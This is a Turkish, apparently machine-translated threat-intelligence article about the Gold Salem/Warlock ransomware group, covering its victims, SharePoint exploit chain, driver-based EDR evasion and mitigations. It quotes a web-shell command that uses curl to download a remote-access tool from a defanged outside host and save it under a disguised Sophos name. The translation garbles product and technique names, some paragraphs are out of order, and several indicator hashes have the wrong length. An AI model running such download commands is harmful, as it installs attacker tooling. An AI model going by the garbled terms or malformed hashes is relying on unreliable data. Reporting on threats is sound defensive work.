Counter Tehdit Unit ™ (CTU) araştırmacıları, CTU’nun Gold Salem olarak belirlediği Warlock Group olarak bilinen sofistike bir tehdit oyuncusu izliyor.
Mart 2025’ten bu yana, grup kurumsal ağlardan ödün verdi ve özel büyücü fidye yazılımlarını dağıtmak için güvenlik çözümlerini atladı.
Microsoft bu kolektifi Storm-2603 olarak ifade ederken ve “Çin merkezli bir tehdit aktörü olmak için ılımlı bir güvenle” ilişkilendirirken, CTU araştırmacıları herhangi bir coğrafi atıf doğrulamamıştır.
Eylül 2025 ortası boyunca Gold Salem, 60 kurbanı özel sızıntı alanına yayınladı ve bu yıl kurban sayısının fidye yazılımı operasyonlarının orta sınıfına yerleştirdi.
Hedefler, Kuzey Amerika, Avrupa ve Güney Amerika’da küçük ticari firmalar, devlet kurumları ve çokuluslu şirketleri kapsamaktadır.
Karakteristik bir şekilde, grup 8 Eylül’e kadar Çin ve Rus organizasyonlarından kaçındı ve sızıntı alanında elektrik üretim sektöründe Rusya merkezli bir mühendislik hizmetleri sağlayıcısı ortaya çıktı.
Bu içerme, aktörlerin fidye yazılımı gaspçılarını agresif bir şekilde takip eden dış yargı bölgelerinden çalışabileceğini göstermektedir.
Gold Salem’in ev sahipliği yapan sızıntı sitesi kurban listeleri ve 16 Eylül itibariyle sadece 19 kurbanın (%32) çalınan verileri yayınlandığı, 27’sinin (%45) özel alıcılara satıldığı bildirildi.
Gold Salem, farklı fidye yazılımı operasyonları tarafından tehlikeye atılan kurbanların isimlerini yayınladı.
İlk Erişim ve Tradecraft
Grup ilk olarak Rampa Yeraltı Forumu’ndaki Haziran 2025 tarihli bir yazı aracılığıyla halka açık bir şekilde ortaya çıktı, kurumsal uygulamalar için istismarlar (Veeam, ESXI, SharePoint) ve uç nokta algılama ve yanıt sistemlerini öldürmek için araçlar istedi.
Bu tür rakamlar şişirilebilir ve daha önce listelenen üç kurban kaldırılmıştır, bu da olası veri doğrulama veya ödeme ayarlamalarını gösterir. Grubun sızıntı sitesi, her kurbana, hızlı bir ödemeye baskı yapmak için genellikle listeden 12-14 gün, fidye geri sayım tarihi atar.
Bu görevlerin, hizmet olarak fidye yazılımı modeli için doğrudan müdahaleleri veya bağlı kuruluşların işe alımını hedeflediği belirsizliğini korumaktadır.
CTU araştırmacıları, Araç Kıyısı istismarı zincirini kullanarak Microsoft SharePoint’ten yararlanarak CVE-2025-49704, CVE-2025-49706, CVE-2025-53770 ve CVE-2025-53771’den yararlanarak ASPX web kabuğunu dikti. Bu kabuk aracılığıyla, saldırganlar aşağıdakiler gibi komutlar yürüttüler:
textcurl -L -o c:\\users\\public\\Sophos\\Sophos-UI.exe hxxps[:]//filebin[.]net/j7jqfnh8tn4alzsr/wsocks.exe.txt
Bu, kalıcı uzaktan erişim sağlayan Golang tabanlı bir WebSockets sunucusunu indirdi. Grup, savunmasız bir Baidu antivirüs sürücüsünü (CVE-2024-51324) googleapiutil64.sys’e yeniden adlandırarak EDR’yi atladı.
Kontratür sonrası faaliyetler, Mimikatz’ın LSASS belleğini hedefleyen kimlik bilgisi hasadı, Psexec ve Impacket aracılığıyla yanal hareket ve Warlock yükünün grup ilkesi nesneleri aracılığıyla dağıtılmasını içeriyordu.
Ağustos ayında Gold Salem, görsel stüdyo kodu ağ tünelleri oluşturmak için açık kaynaklı Velociraptor DFIR aracını kötüye kullandı, uyarlanabilir araçlarını ve kötü amaçlı uçlar için meşru yardımcı programları yeniden kullanma istekliliğini gösterdi.
Hafifletme
Bu tehdide karşı savunmak için kuruluşlar internete bakan hizmetler için agresif bir yama sürdürmeli ve sürekli saldırı yüzey izlemesi uygulamalıdır.
Proaktif uç nokta izleme ve hızlı olay yanıtı, sıfır gün sömürüsünü tespit etmek için kritiktir. Sophos Koruma Troj/Webshel-F ve Troj/Warlock-B, ilgili etkinliği tanımlayabilir.
CTU araştırmacıları aşağıdaki göstergeleri kullanarak erişimi gözden geçirmeyi ve kısıtlamayı önerir:
| Gösterge | Tip | Bağlam |
|---|---|---|
| BFBEAC96A385B1E5643EC0752B132506 | MD5 | ASPX Web Kabası Kullanılmış Tarama Sonrası Araç Kazası Sömürü |
| DE25BE0AFD53A1D274EC02E530362FC8E7DDD5 | SHA1 | ASPX Web Kabası Kullanılmış Tarama Sonrası Araç Kazası Sömürü |
| 996C7BCEC3C12C3462220FC2C19D61CCC039005EF | SHA256 | ASPX Web Kabası Kullanılmış Tarama Sonrası Araç Kazası Sömürü |
| B3A099ECCA79503A0E4A154BD85D3E6B | MD5 | WebSockets Uzaktan Erişim Aracı (wsocks.exe.txt) |
| 6d0cc6349a9510b52394ad3436d165ec5fba6a | SHA1 | WebSockets Uzaktan Erişim Aracı (wsocks.exe.txt) |
| A204A48496B54BCB7AE171AD43597B92B746B5 | SHA256 | WebSockets Uzaktan Erişim Aracı (wsocks.exe.txt) |
Kuruluşlar bu karmaları ağa ve uç nokta telemetrisine karşı doğrulamalı ve yanal hareketi sınırlamak için sağlam segmentasyon sağlamalıdır.
Araç köyü sömürüsü belirtileri ve BYOVD teknikleri için sürekli tehdit avı, Gold Salem’in gelişen büyücü fidye yazılımı operasyonunun sağladığı riski daha da azaltabilir.
Bu hikayeyi ilginç bul! Daha fazla güncelleme almak için bizi LinkedIn ve X’te takip edin.